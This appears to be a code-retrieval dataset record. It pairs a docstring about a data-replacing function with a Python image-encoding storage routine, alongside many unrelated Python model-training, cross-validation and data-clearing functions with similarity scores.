silent=True, verbose=True):\r\n save_prefix = 'ssd_{}_{}_{}'.format(self.img_size, self.backbone, dataset.dataset_type)\r\n\r\n # convert dataset to compatible format\r\n dataset = self.__prepare_dataset(dataset)\r\n\r\n # set save dir for checkpoint saving\r\n self.__create_model(dataset.classes)\r\n if verbose:\r\n print(\"Saving models as: {}\".format(save_prefix))\r\n\r\n checkpoints_folder = os.path.join(self.temp_path, '{}_checkpoints'.format(save_prefix))\r\n if self.checkpoint_after_iter != 0 and not os.path.exists(checkpoints_folder):\r\n # user set checkpoint_after_iter so checkpoints must be created\r\n # create checkpoint dir\r\n os.makedirs(checkpoints_folder, exist_ok=True)\r\n\r\n start_epoch = 0\r\n if self.checkpoint_load_iter > 0:\r\n # user set checkpoint_load_iter, so load a checkpoint\r\n checkpoint_name = self.checkpoint_str_format.format(self.checkpoint_load_iter)\r\n checkpoint_path = os.path.join(checkpoints_folder, checkpoint_name)\r\n try:\r\n self._model.load_parameters(checkpoint_path)\r\n start_epoch = self.checkpoint_load_iter + 1\r\n except FileNotFoundError as e:\r\n e.strerror = 'No such file or directory {}'.format(checkpoint_path)\r\n\r\n # set device\r\n # NOTE: multi-gpu a little bugged\r\n if 'cuda' in self.device:\r\n if mx.context.num_gpus() > 0:\r\n if self.device == 'cuda':\r\n ctx = [mx.gpu(0)]\r\n else:\r\n ctx = [mx.gpu(int(self.device.split(':')[1]))]\r\n else:\r\n ctx = [mx.cpu()]\r\n else:\r\n ctx = [mx.cpu()]\r\n\r\n with warnings.catch_warnings(record=True):\r\n warnings.simplefilter(\"always\")\r\n self._model.initialize()\r\n self._model.collect_params().reset_ctx(ctx[0])\r\n if verbose:\r\n print(\"Network:\")\r\n print(self._model)\r\n\r\n # get data loader\r\n with autograd.train_mode():\r\n _, _, anchors = self._model(mx.nd.zeros((1, 3, self.img_size, self.img_size), ctx[0]))\r\n anchors = anchors.as_in_context(mx.cpu())\r\n\r\n # transform dataset & get loader\r\n train_transform = presets.ssd.SSDDefaultTrainTransform(self.img_size, self.img_size, anchors)\r\n dataset = dataset.transform(train_transform)\r\n\r\n batchify_fn = Tuple(Stack(), Stack(), Stack())\r\n train_loader = gluon.data.DataLoader(\r\n dataset, self.batch_size, shuffle=True, batchify_fn=batchify_fn,\r\n last_batch='rollover', num_workers=self.num_workers\r\n )\r\n\r\n trainer = gluon.Trainer(self._model.collect_params(),\r\n 'sgd', {'learning_rate': self.lr,\r\n 'wd': self.weight_decay,\r\n 'momentum': self.momentum},\r\n update_on_kvstore=None)\r\n mbox_loss = SSDMultiBoxLoss()\r\n ce_metric = mx.metric.Loss('cross_entropy_loss')\r\n smoothl1_metric = mx.metric.Loss('smoothl1_loss')\r\n\r\n self._model.collect_params().reset_ctx(ctx)\r\n self._model.hybridize(static_alloc=True, static_shape=True)\r\n\r\n # start training\r\n training_dict = {\"cross_entropy_loss\": [], \"smoothl1_loss\": [], \"val_map\": []}\r\n n_iters = 0\r\n for epoch in range(start_epoch, self.epochs):\r\n autograd.set_training(True)\r\n cur_lr = self.__get_lr_at(epoch)\r\n trainer.set_learning_rate(cur_lr)\r\n\r\n self._model.hybridize(static_alloc=True, static_shape=True)\r\n\r\n tic = time.time()\r\n # TODO: epoch + 1\r\n print('[Epoch {}/{} lr={}]'.format(epoch, self.epochs, trainer.learning_rate))\r\n ce_metric.reset()\r\n smoothl1_metric.reset()\r\n\r\n for i, batch in enumerate(train_loader):\r\n n_iters += 1\r\n data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0)\r\n cls_targets = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\r\n box_targets = gluon.utils.split_and_load(batch[2], ctx_list=ctx, batch_axis=0)\r\n\r\n with autograd.record():\r\n cls_preds = []\r\n box_preds = []\r\n for x in data:\r\n cls_pred, box_pred, _ = self._model(x)\r\n cls_preds.append(cls_pred)\r\n box_preds.append(box_pred)\r\n sum_loss, cls_loss, box_loss = mbox_loss(\r\n cls_preds, box_preds, cls_targets, box_targets)\r\n autograd.backward(sum_loss)\r\n\r\n trainer.step(1)\r\n\r\n ce_metric.update(0, [l * self.batch_size for l in cls_loss])\r\n smoothl1_metric.update(0, [l * self.batch_size for l in box_loss])\r\n if n_iters % self.log_after == self.log_after - 1:\r\n name1, loss1 = ce_metric.get()\r\n name2, loss2 = smoothl1_metric.get()\r\n # TODO: epoch + 1\r\n print('[Epoch {}][Batch {}] {}={:.3f}, {}={:.3f}'.format(\r\n epoch, i, name1, loss1, name2, loss2\r\n ))\r\n toc = time.time()\r\n\r\n # perform evaluation during training\r\n if epoch % self.val_after == self.val_after - 1 and val_dataset is not None:\r\n if verbose:\r\n print(\"Model evaluation at epoch {}\".format(epoch))\r\n eval_dict = self.eval(val_dataset)\r\n training_dict[\"val_map\"].append(eval_dict[\"map\"])\r\n\r\n # checkpoint saving\r\n if self.checkpoint_after_iter > 0 and epoch % self.checkpoint_after_iter == self.checkpoint_after_iter - 1:\r\n if verbose:\r\n print('Saving model at epoch {}'.format(epoch))\r\n checkpoint_name = self.checkpoint_str_format.format(epoch)\r\n checkpoint_filepath = os.path.join(checkpoints_folder, checkpoint_name)\r\n self._model.save_parameters(checkpoint_filepath)\r\n\r\n name1, loss1 = ce_metric.get()\r\n name2, loss2 = smoothl1_metric.get()\r\n training_dict[\"cross_entropy_loss\"].append(loss1)\r\n training_dict[\"smoothl1_loss\"].append(loss2)\r\n # TODO: epoch + 1\r\n print('[Epoch {}] Training cost: {:.3f}, {}={:.3f}, {}={:.3f}'.format(\r\n epoch, toc - tic, name1, loss1, name2, loss2\r\n ))\r\n\r\n return training_dict", "def train_model(model, train, validation):\n # Add your code here\n\n monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3, patience=5, verbose=1, restore_best_weights=True)\n\n model.fit_generator(\n generator=train,\n validation_data=validation,\n epochs=1000,\n callbacks=monitor\n\n )\n # Preprocessing (Enrichment)\n # Preprocessing (Normalisation)\n\n return model", "def trainRegressionModel(X,y):\n # # instantiate a logistic regression model, and fit with X and y\n # model = LogisticRegression()\n # model = model.fit(X, y)\n # # check the accuracy on the training set\n # print(model.score(X, y))\n #X['intercept'] = 1.0\n #del X['isCapitalized']\n #del X['isNN']\n #del X['isNNP']\n #del X['isJJ']\n #del X['isUpper']\n #del X['isPrecedingIN']\n logit = sm.Logit(y, X)\n result = logit.fit()\n print(result.summary())\n print(result.conf_int())\n model = LogisticRegression()\n model = model.fit(X, y)\n print(model.score(X, y))\n print(y.mean())\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n model2 = LogisticRegression()\n model2.fit(X_train, y_train)\n # predict class labels for the test set\n predicted = model.predict(X_test)\n print(predicted)\n for i in predicted:\n if i==1:\n print(\"Test:\"+str(i))\n print(max(predicted))\n #generate class probabilities\n probs = model2.predict_proba(X_test)\n print(probs)\n # generate evaluation metrics\n print(\"Accuracy: \"+str(metrics.accuracy_score(y_test, predicted)))\n print(\"AUC: \"+str(metrics.roc_auc_score(y_test, probs[:, 1])))\n print(metrics.confusion_matrix(y_test, predicted))\n print(metrics.classification_report(y_test, predicted))\n\n from sklearn.cross_validation import cross_val_score\n # evaluate the model using 10-fold cross-validation\n scores = cross_val_score(LogisticRegression(), X, y, scoring='accuracy', cv=10)\n print(scores)\n print(scores.mean())", "def train_an_epoch(self, train_loader, epoch_id):\n assert hasattr(self, \"model\"), \"Please specify the exact model !\"\n self.model.train()\n total_loss = 0\n kl_loss = 0\n rec_loss = 0\n # with autograd.detect_anomaly():\n for batch_id, sample in enumerate(train_loader):\n assert isinstance(sample, torch.Tensor)\n pos_u = torch.tensor(\n [triple[0] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n pos_i_1 = torch.tensor(\n [triple[1] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n pos_i_2 = torch.tensor(\n [triple[2] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n neg_u = torch.tensor(\n self.data.user_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n neg_i_1 = torch.tensor(\n self.data.item_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n neg_i_2 = torch.tensor(\n self.data.item_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n batch_data = (pos_u, pos_i_1, pos_i_2, neg_u, neg_i_1, neg_i_2)\n loss = self.train_single_batch(batch_data)\n total_loss += loss\n kl_loss += self.model.kl_loss\n rec_loss += self.model.rec_loss\n total_loss = total_loss / self.config[\"model\"][\"batch_size\"]\n rec_loss = rec_loss / self.config[\"model\"][\"batch_size\"]\n kl_loss = kl_loss / self.config[\"model\"][\"batch_size\"]\n print(\n \"[Training Epoch {}], log_like_loss {} kl_loss: {} alpha: {} lr: {}\".format(\n epoch_id,\n rec_loss,\n kl_loss,\n self.model.alpha,\n self.config[\"model\"][\"lr\"],\n )\n )\n self.writer.add_scalars(\n \"model/loss\",\n {\n \"total_loss\": total_loss,\n \"rec_loss\": total_loss - kl_loss,\n \"kl_loss\": kl_loss,\n },\n epoch_id,\n )", "def train(x_train, y_train, labels_train, batch_size=32, epoch=200):\n skf = KFold(n_splits=5, random_state=17, shuffle=True)\n i = 0\n model_paths = []\n for train_index, test_index in skf.split(x_train):\n x_tr_fold = x_train[train_index]\n y_tr_fold = y_train[train_index]\n x_val_fold = x_train[test_index]\n y_val_fold = y_train[test_index]\n lab_val_fold = labels_train[test_index]\n\n model = VGG_Unet_model()\n optim = Adam()\n model_paths += [\"models/fold{}.h5\".format(i)]\n model.compile(optimizer=optim, loss=full_loss, metrics=[dice_coef])\n callbacks_list = [TestCallback((x_val_fold, lab_val_fold), model_paths[-1], once_in=25)]\n\n x_val, y_val = [], []\n for x_cur, y_cur in zip(x_val_fold, y_val_fold):\n x_val.extend(get_cropped_array(x_cur))\n y_val.extend(get_cropped_array(y_cur))\n x_val = [augment_test(x)[0] for x in x_val]\n x_val = np.array(x_val)\n y_val = np.array(y_val)\n subsample_ind = np.random.choice(len(x_val), size=200, replace=False)\n\n steps_per_epoch = x_tr_fold.shape[0] // batch_size\n\n model.fit_generator(batch_generator(x_tr_fold, y_tr_fold, batch_size, augment_train),\n steps_per_epoch=steps_per_epoch,\n epochs=epoch, verbose=1, callbacks=callbacks_list, workers=6,\n validation_data=(x_val[subsample_ind], y_val[subsample_ind]))\n i += 1\n return model_paths", "def train_model(model, train_input, train_target, validation_input, validation_target, nb_epochs, mini_batch_size, learning_rate, momentum = 0, sched_ = None, opt = 'SGD', loss = 'MSE'):\n if opt == 'SGD' :\n optimizer = SGD(model.param(), learning_rate, momentum)\n elif opt == 'Adadelta':\n optimizer = Adadelta(model.param(), learning_rate)\n sched = Scheduler(learning_rate)\n \n if loss == 'MSE' :\n criterion = MSELoss()\n elif loss == 'CrossEntropy' :\n criterion = CrossEntropy()\n \n losses = []\n train_errors = []\n validation_errors = []\n\n for epoch in range(nb_epochs):\n acc_loss = 0\n nb_train_errors = 0\n indices = torch.randperm(train_input.size(0))\n \n for b in range(0, train_input.size(0), mini_batch_size):\n # indices for batch\n indices_subset = indices[b:b+mini_batch_size]\n # subsets for batch\n train_input_subset = train_input.index_select(0, indices_subset)\n train_target_subset = train_target.index_select(0, indices_subset)\n \n optimizer.zero_grad() \n output = model.forward(train_input_subset)\n \n for k in range(mini_batch_size):\n if torch.max(train_target.data[indices[b+k]], 0)[1] != torch.max(output[k], 0)[1]:\n nb_train_errors += 1\n \n loss = criterion.forward(output, train_target_subset)\n acc_loss += loss\n \n output_grad = criterion.backward()\n model.backward(output_grad)\n optimizer.step()\n if sched_ == 'step_decay' :\n sched.step_decay(epoch, learning_rate, 0.5, nb_epochs/4)\n if sched_ == 'clr' :\n sched.cyclical_lr(nb_epochs, learning_rate/4, learning_rate, epoch)\n elif sched_ == None :\n pass\n \n losses.append(acc_loss)\n train_errors.append((100 * nb_train_errors) / train_input.size(0))\n \n nb_validation_errors, _ = compute_nb_errors(model, validation_input, validation_target, mini_batch_size)\n validation_errors.append((100 * nb_validation_errors) / validation_input.size(0))\n \n if epoch%10 == 0: print('Epoch {:d} Train loss {:.02f} Train error {:.02f}% Validation error {:.02f}%'.format(epoch, acc_loss, (100 * nb_train_errors) / train_input.size(0), (100 * nb_validation_errors) / validation_input.size(0)))\n \n return losses, train_errors, validation_errors", "def train_model(self,model):\r\n \r\n train_state = {'stop_early': False,\r\n 'early_stopping_step': 0,\r\n 'early_stopping_best_val': 1e8,\r\n 'learning_rate': self.lr,\r\n 'epoch_index': 0,\r\n 'train_loss': [],\r\n 'val_loss': [],\r\n 'best_model':model}\r\n \r\n dataset = self.dataset\r\n loss_fn = self.loss_fn\r\n \r\n dataset.set_split('train')\r\n print(\"Training module with \"+str(len(dataset))+\" examples\")\r\n \r\n data_loader = DataLoader(dataset,batch_size=self.batch_size,shuffle=True,\r\n drop_last=True)\r\n \r\n optimizer = optim.Adam(model.parameters(), lr=self.lr)\r\n \r\n for epoch in range(self.epochs):\r\n train_state['epoch_index'] = epoch\r\n #First step in each epoch is to train over all batches\r\n model.train()\r\n dataset.set_split('train')\r\n train_loss = 0\r\n for b_i,batch_data in enumerate(data_loader):\r\n #Step 1: zero gradients\r\n optimizer.zero_grad()\r\n #Step 2: run forward\r\n X = batch_data['x']\r\n output = model(X)\r\n #Step 3: compute loss\r\n target = batch_data['y']\r\n loss = loss_fn(output,target)\r\n #Step 4: run backward\r\n loss.backward()\r\n #Step 5: update\r\n optimizer.step()\r\n \r\n #Record accumulated loss\r\n new_loss = loss.item()\r\n train_loss += new_loss\r\n \r\n train_loss /= b_i\r\n train_state['train_loss'].append(train_loss)\r\n \r\n #After training, compute loss on validation set and check for early stop\r\n model.eval()\r\n dataset.set_split('val')\r\n val_loss = 0\r\n for b_i,batch_data in enumerate(data_loader):\r\n #Step 1: run forward\r\n X = batch_data['x']\r\n output = model(X)\r\n #Step 2: compute loss\r\n target = batch_data['y']\r\n loss = loss_fn(output,target)\r\n \r\n #Record accumulated loss\r\n new_loss = loss.item()\r\n val_loss += new_loss\r\n \r\n val_loss /= b_i\r\n train_state['val_loss'].append(val_loss)\r\n \r\n print(\"Finished epoch \"+str(epoch+1)+\". Train loss=\"+\\\r\n str(train_loss)+\", Val loss=\"+str(val_loss))\r\n \r\n if val_loss < train_state['early_stopping_best_val']:\r\n #new best model, reset stopping counter, store model\r\n train_state['early_stopping_step'] = 0\r\n train_state['early_stopping_best_val'] = val_loss\r\n best_model = copy.deepcopy(model)\r\n best_model.load_state_dict(model.state_dict())\r\n train_state['best_model'] = best_model\r\n else:\r\n #val loss not improved; increase early stopping counter\r\n train_state['early_stopping_step'] += 1\r\n if train_state['early_stopping_step'] >= self.early_stopping_criteria:\r\n train_state['stop_early'] = True\r\n print(\"Val loss failed to improve. Stopping early.\")\r\n break\r\n \r\n return train_state['best_model'],train_state", "def cross_validation(self, stock_data):\n\n self.X_train, self.X_test, self.y_train, self.y_test = cross_validation.train_test_split(stock_data['X'], stock_data['Y'], test_size=0.2, train_size=0.8, random_state=3)", "def valid_one_epoch(self):\n prog_bar = tqdm(enumerate(self.valid_data), total=len(self.valid_data))\n self.model.eval()\n all_targets = []\n all_predictions = []\n with torch.no_grad():\n for idx, inputs in prog_bar:\n ids = inputs['inputs'].to(self.device, dtype=torch.long)\n mask = inputs['attention_mask'].to(self.device, dtype=torch.long)\n targets = inputs['targets'].to(self.device, dtype=torch.float)\n\n outputs = self.model(input_ids=ids, attention_mask=mask)\n all_targets.extend(targets.cpu().detach().numpy().tolist())\n all_predictions.extend(outputs.cpu().detach().numpy().tolist())\n\n val_rmse_loss = np.sqrt(mean_squared_error(all_targets, all_predictions))\n print('Validation RMSE: {:.2f}'.format(val_rmse_loss))\n \n return val_rmse_loss", "def cross_validation(ww_data, rw_data, k):\n # shuffle the data\n np.random.shuffle(ww_data)\n np.random.shuffle(rw_data)\n\n # calculate cutoff for each partition\n cutoff = ww_data.shape[0]//k\n redArr = []\n whiteArr = []\n tmpStart = 0\n tmpEnd = cutoff\n \n # create a list of k partitions for red and white data\n for x in range(k):\n if x != k-1:\n redArr.append(rw_data[tmpStart:tmpEnd])\n whiteArr.append(ww_data[tmpStart:tmpEnd])\n else:\n redArr.append(rw_data[tmpStart:])\n whiteArr.append(ww_data[tmpStart:])\n tmpStart+=cutoff\n tmpEnd+=cutoff\n\n\n redTraining = np.array(())\n whiteTraining = np.array(())\n accuracy = 0\n count = 0\n \n for x in range(k):\n # creates Test data set\n tmpRedTest = redArr[x]\n tmpWhiteTest = whiteArr[x]\n \n # creates list of partitons for training data set\n if x!=k-1:\n redTrainingList = redArr[:x] + redArr[x+1:]\n whiteTrainingList = whiteArr[:x] + whiteArr[x+1:]\n else:\n redTrainingList = redArr[:x]\n whiteTrainingList = whiteArr[:x]\n\n # stacks each training list into one nparray\n redTraining = np.vstack(redTrainingList)\n whiteTraining = np.vstack(whiteTrainingList)\n\n accuracy += experiment(whiteTraining, redTraining, tmpWhiteTest, tmpRedTest)\n count += 1\n # calculates accuracy and returns it\n result = accuracy/count\n return result", "def train_model(model, data_train, y_train, data_test, y_test, ARGS):\n callback_list = create_callbacks(model, (data_test, y_test), ARGS)\n train_generator = SequenceBuilder(data_train, ARGS, target=y_train, target_out=True)\n test_generator = SequenceBuilder(data_test, ARGS, target=y_test, target_out=True)\n history = model.fit_generator(generator=train_generator,\n epochs=ARGS.epochs, verbose=2,\n validation_data=test_generator,\n # validation_freq=[1, 5, 10],\n callbacks=callback_list\n # ,max_queue_size=15, use_multiprocessing=False,\n # workers=3, initial_epoch=0\n )\n return history", "def validate(self):\n X_orig = make_X_from_features(self._conf)\n train_sz = len(load_array(self._conf, 'task.dataset.id_train'))\n X = X_orig[:train_sz, :]\n y = load_array(self._conf, 'task.dataset.y_train')\n y = y.reshape(y.size)\n\n cv_method_name = self._conf['task']['params']['validation']['class']\n cv_params_name = self._conf['task']['params']['validation'].get(\n 'params', {})\n cv_params_name = _to_str_value(cv_params_name)\n\n cv_method = dynamic_load(cv_method_name)\n mean_cv_score = cv_method(X, y, self, **cv_params_name)\n\n task_metrics = self._conf['task']['params']['metrics']\n task_method = task_metrics['method']\n\n ume.db.add_validation_score(\n os.path.basename(self._jn),\n ume.__version__,\n task_method,\n mean_cv_score)", "def train(self):\n df = self.df\n self.scaler = MinMaxScaler()\n self.scaler.fit(df)\n df[df.columns] = self.scaler.transform(df)\n\n\n X_train, y_train = get_X_y(df, self.n_days, self.length , self.style)\n X_train = np.array(X_train)\n X_train.shape = (X_train.shape[0], X_train.shape[2])\n\n self.clf = LogisticRegression().fit(X_train, y_train)\n\n #es = EarlyStopping(monitor = 'accuracy',mode = 'min' , verbose = 1, patience = 100, restore_best_weights = True)", "def _cross_validate(\n x: pd.DataFrame,\n y: pd.Series,\n model: Callable,\n scorer: Callable,\n cv: int = 5,\n time_series: bool = False,\n random_state: Optional[int] = None,\n n_jobs: int = 1,\n ) -> float:\n if time_series:\n k_fold = sklearn.model_selection.TimeSeriesSplit(n_splits=cv)\n else:\n k_fold = sklearn.model_selection.KFold(\n n_splits=cv, shuffle=False, random_state=random_state\n )\n\n return sklearn.model_selection.cross_val_score(\n model, x, y, scoring=scorer, cv=k_fold, n_jobs=n_jobs,\n ).mean()", "def run_lgr():\n num_folds = 5\n with pd.HDFStore('./OT_clr_train_LGG_grade.h5') as store:\n X = store['expression'].values\n Y = store['labels'].values\n\n # standardize expression\n mu = np.mean(X, axis=0)\n std = np.std(X, axis=0)\n X = (X-mu)/std\n\n # define CVmodel to manage hyperparameter selection\n cvmodel = CVmodel(LogisticRegressor_skl,\n [1e-6, 1e-5, 1e-4, 1e-3, 1e-2,1e-1,1,10,100,1000], 'C^-1',\n solver = 'lbfgs', max_iter=5000, multi_class='auto')\n\n # define Predictor object to manage nested CV\n lg_predictor = Predictor(cvmodel,scorers.accuracy_scorer)\n\n # cross validate\n lg_cross_validation_scores = \\\n lg_predictor.cross_validate(X, Y,\n outer_folds=num_folds, inner_folds=num_folds)\n logger.info('Logistic Regression cross-validation = {0:.3f}'.format(\n np.mean(lg_cross_validation_scores)))", "def validate(val_loader, model, criterion, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda(async=True)\n input = input.cuda()\n input_var = torch.autograd.Variable(input, volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_var)\n loss = criterion(output, target_var)\n\n # measure accuracy and record loss\n prec1 = accuracy(output.data, target, topk=(1,))[0]\n losses.update(loss.data[0], input.size(0))\n top1.update(prec1[0], input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1))\n\n print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))\n # log to TensorBoard\n # if args.tensorboard:\n # log_value('val_loss', losses.avg, epoch)\n # log_value('val_acc', top1.avg, epoch)\n return top1.avg", "def validate_model_with_params(self, model_params: dict) -> None:\n\n # init model\n model = CrossAttentionTransformerEncoder(**model_params)\n\n # init random sequences that don't exceed max sequences length\n seq_a_len = random.randint(0, model_params[\"max_seq_len_a\"])\n seq_b_len = random.randint(0, model_params[\"max_seq_len_b\"])\n batch_size = random.randint(1, 10)\n s1 = torch.randint(0, model_params[\"num_tokens_a\"], (batch_size, seq_a_len))\n s2 = torch.randint(0, model_params[\"num_tokens_b\"], (batch_size, seq_b_len))\n\n # processing sample\n output = model(s1, s2)\n\n # validation\n assert output.shape[0] == batch_size\n if output[:, 0].shape[1] != model_params[\"output_dim\"]:\n raise Exception(\n f\"Expected output dimension to be {model_params['output_dim']}, but got: {output.shape[1]}. used model parameters: {model_params}.\"\n )" ]
[ "0.67092973", "0.6439459", "0.6373035", "0.63298774", "0.6288726", "0.61524415", "0.6071506", "0.6043888", "0.6030679", "0.60297436", "0.6009352", "0.5996283", "0.59651506", "0.5964834", "0.5883891", "0.5877334", "0.5846096", "0.57740736", "0.5755319", "0.5751334", "0.57471675", "0.5740231", "0.5739641", "0.57371575", "0.57015836", "0.56994325", "0.5666097", "0.56631505", "0.5662652", "0.56621575", "0.5631688", "0.56198454", "0.5601584", "0.5527176", "0.55119246", "0.5500913", "0.55004704", "0.5499119", "0.54799646", "0.5465875", "0.54511154", "0.5450076", "0.54457206", "0.54429615", "0.54421353", "0.54353434", "0.5420726", "0.54172146", "0.54081064", "0.54033536", "0.5398616", "0.53949827", "0.53896844", "0.53859335", "0.5385311", "0.5382542", "0.5374201", "0.5352137", "0.53483766", "0.5344138", "0.53284127", "0.53090835", "0.5305456", "0.53042984", "0.52902615", "0.52813697", "0.52791524", "0.52763003", "0.5273129", "0.52624255", "0.5257723", "0.5252061", "0.5249418", "0.5248159", "0.5241804", "0.5237876", "0.5231722", "0.5217445", "0.52168435", "0.5211341", "0.52015436", "0.51981354", "0.5194741", "0.5189682", "0.5186058", "0.5181972", "0.5179446", "0.51721406", "0.51701176", "0.5164236", "0.51622844", "0.51608753", "0.51596683", "0.51574033", "0.51500493", "0.51495904", "0.51490206", "0.5144162", "0.5140526", "0.51399213", "0.51340944" ]
0.0
-1
DO NOT CALL THIS FUNCTION UNLESS YOU HAVE DATA YOU WANT TO STORE IT DELETES THE CURRENT DATA.
def store_images(database): # image folder folder_path = os.getcwd() + '/Data/Test' img_width, img_height = 224, 224 images = [] label = [] for _, dirs, _ in os.walk(folder_path, topdown=True): for directory in dirs: sub_folder_path = os.path.join(folder_path, directory) for _, _, files in os.walk(sub_folder_path): for name in files: if name != '.DS_Store': img = os.path.join(sub_folder_path, name) img = image.load_img(img, target_size=(img_width, img_height)) img = image.img_to_array(img) img = np.expand_dims(img, axis=0) images.append(img) label.append(directory) images = np.vstack(images) model = Model() predictions = model.model.predict(images, batch_size=10) db_actions.reinitialize_table(database) for i in range(100): prediction = predictions[i, :] normalized_prediction = prediction / np.sum(prediction) db_actions.add_encoding(database, normalized_prediction, label[i]) print("Sum is: {}".format(np.sum(normalized_prediction)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clearData():\n Co8PersistentData.__dataDict.clear()", "def clear_data(self):\n if isinstance(self.data, DataManager):\n self.data._update_keys(clear=True)\n else:\n self.data = {}", "def clear_storage(self):\r\n raise NotImplementedError('override me')", "def reset_data(self):\n self.data = []", "def clean_data():\n redis_db.flushdb()", "def delete(self):\n self.data = None", "def clean_up_data(self):\n pass", "def clear_data():\n conn = get_connect()\n #conn.execute(\"DELETE from match\")\n #conn.execute(\"DELETE from account\")\n #conn.execute(\"DELETE from championMatchData\")\n conn.execute(\"DELETE from championData\")\n conn.commit()\n conn.close()\n print(\"all data in info.db has been cleared\")\n return", "def reset_data(self):\n self.data = None", "def remove_data(data=None): #clear\n data = get_data(data)\n shutil.rmtree(data)", "def delete_data(self,*args):\n if args:\n for param in args:\n del self.data[param]\n self.__init__(**self.data)\n else:\n self.__init__()\n print('Deleted data. See current data by using print(object_name) or using check_data method')", "def clearStore(self):\n os.remove(self.uid+\".pcl\")\n self.items = []", "def clearValue(self):\n self.data = []", "def clear(self):\n self._store = {}", "def delete_data(self, data_sig):\n data_i = sqlite3.connect('data::memory:', check_same_thread=False)\n data_cursor = data_i.cursor()\n data_cursor.execute('DELETE FROM localdata where data_sig==(:data_sig)', {\"data_sig\":data_sig})\n item = data_cursor.fetchall()\n data_i.commit()\n data_i.close()\n return item", "def releaseTraingingData(self):\n del(self.documents)\n #del(self.sumsOfVectors)\n self.documents = {}\n #self.sumsOfVectors = {}", "def clear(self):\n self._data = []", "def clear(self):\n self._data = []", "def remove_data():\n # Removing the existing data\n col_answer_given.remove()\n col_answer_not_given.remove()\n col_q_not_given.remove()\n col_to_summarize.remove()", "def remove_data(self):\n db.session.delete(self)\n db.session.commit( )", "def clear_data_from_table():\n global data_base, table\n sqlite3_simple_clear_table(data_base, table)\n output_on_display.delete(1.0, END)\n output_on_display.insert(END, '')\n return", "def clear_data(cls):\n cls.__data.clear()\n cls.__counters.clear()", "def clear(self) -> None:\n self.data = {} # defaultdict fails (T282865)\n self.size = 0", "def current_remove(self):\n storage.close()", "def datamunge(cls, data):\n pass", "def clear(self):\n for key in self.__data.keys():\n del self.__data[key]", "def save_end(self):\n data = self.savedata\n self.savedata = None\n return data", "def saveData(self):\n pass", "def discard_temp_data(self):\n self.data = None\n self.points = None", "def removeData(key):\n #only string keys are accepted\n if ( type(key) != str ): return None\n \n try:\n del Co8PersistentData.__dataDict[key]\n except KeyError:\n pass", "def clear(self):\n self._data = PositionalList()", "def _finalize_data(self, data):\n return data", "def removeData(self, data: ghidra.program.model.listing.Data) -> None:\n ...", "def delete_all(self):\n with self.__lock:\n self.__data = dict()\n self.flush()", "def clear_data(self):\n self.game_list.clear()\n self.game_scores.clear()", "def clear(self):\n self._data.clear()", "def _reset_stored(self):\n ## Main information\n self.idxs = None\n self.sp_relative_pos = None\n self._setted = False\n self.ks = None\n self.iss = [0]", "def tearDown(self):\n self.all_ob = storage.all()\n self.all_ob.clear()\n storage.save()", "def delete(self, data):\n self.data.remove(data)", "def clear_temporary_data(self):\n self.extract_list = []\n self.transform_result = {}", "def reset(self):\n self._data = []", "def clearData(self):\r\n self.title.setVal(\"\"),\r\n self.first.setVal(\"\"),\r\n self.middle.setVal(\"\"),\r\n self.last.setVal(\"\"),\r\n self.suffix.setVal(\"\"),\r\n self.phone.setVal(\"\"),\r\n self.ext.setVal(\"\"),\r\n self.email.setVal(\"\"),\r\n self.affiliation.setVal(\"\")\r\n self.fullName.setVal(\"\")", "def save_data(self):\n pass", "def clear():", "def delete(self):\n return self.get_data()", "def store_data(self, data):\n self.data.append(data)", "def cleanup(self, data):\n tmp = copy.copy(data)\n for field in ('log_entries', 'instances',\n 'picked_instances', 'saved_instances',\n 'terminated_instances', 'skipped_instances'):\n if field in tmp:\n del tmp[field]\n return tmp", "def clear_data(self):\n if DataLoader.data is None:\n return\n\n self.clear_tree()\n # Clears the Header\n self.treeview['columns'] = []\n for i in self.treeview['columns']:\n self.treeview.column(i, anchor=\"w\")\n self.treeview.heading(i, text=i, anchor='w')\n # Clears the Data\n\n DataLoader.data = None\n gc.collect()\n self.summary_label.destroy()\n\n # Replace with default values\n self.treeview['columns'] = list(DataLoader.default.columns)\n for i in self.treeview['columns']:\n self.treeview.column(i, anchor=\"w\")\n self.treeview.heading(i, text=i, anchor='w')\n for index, row in DataLoader.default.iterrows():\n self.treeview.insert(\"\", 0, text=self.default.shape[0] - 1 - index, values=list(row))\n self.treeview.column('#1', width=500)", "def the_ending(self):\n storage.close()", "def clear_data_cache():\n load_glove.cache_clear()", "def reset_storage(self):\n self.set_storage()", "def reset(self):\n self.temp_data.clear()", "def removeall(self):\n\n # If there used to be a key, there must exist an old value blob somewhere in the database. It should be deallocated after a successful commit to disk.\n for key in self.keys:\n if self.keys[key] is not None:\n punchat,punchlen = self.keys[key]\n self.awaitingpunch.append((punchat, punchlen))\n \n self.keys = {}\n self.buffered = {}\n self.cache = {}\n \n if self.autocommit:\n commit()", "def test_data_object_del(self):\n pass", "def clear(self):\n self._storage.clear()", "def 